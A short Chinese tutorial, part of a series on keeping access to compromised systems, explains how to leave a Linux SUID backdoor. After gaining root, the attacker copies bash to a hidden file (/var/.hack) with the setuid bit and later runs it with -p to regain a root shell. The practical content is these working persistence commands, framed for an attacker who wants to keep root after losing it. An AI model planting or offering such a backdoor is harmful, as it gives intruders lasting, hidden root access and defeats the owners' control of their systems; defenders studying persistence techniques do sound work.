操作系统权限维持（七）之Linux系统-SUID后门

系列文章

操作系统权限维持（一）之Windows系统-粘贴键后门
操作系统权限维持（二）之Windows系统-克隆账号维持后门
操作系统权限维持（三）之Windows系统-启动项维持后门
操作系统权限维持（四）之Windows系统-计划任务维持后门
操作系统权限维持（五）之Windows系统-系统服务维持后门
操作系统权限维持（六）之Linux系统-定时任务后门

SUID后门

SUID后门的必要条件：

首先SUID权限仅对二进制程序有效；
执行者必须对这个程序有可执行的权限；
本权限仅在执行该程序的过程中有效；
在执行过程中执行者将具有该程序拥有者的权限

当我们在已经获得了root用户的权限下，要去维持这个root用户的权限时

在root用户执行：

cp /bin/bash /var/.hack 
chmod 4775 /var/.hack 
ls -al /var/.hack

我们通过这样的方式去留下一个SUID后门，当我们丢失了root权限，只有一个普通用户权限的时候运行以下命令，重新拿到root权限

/var/.hack -p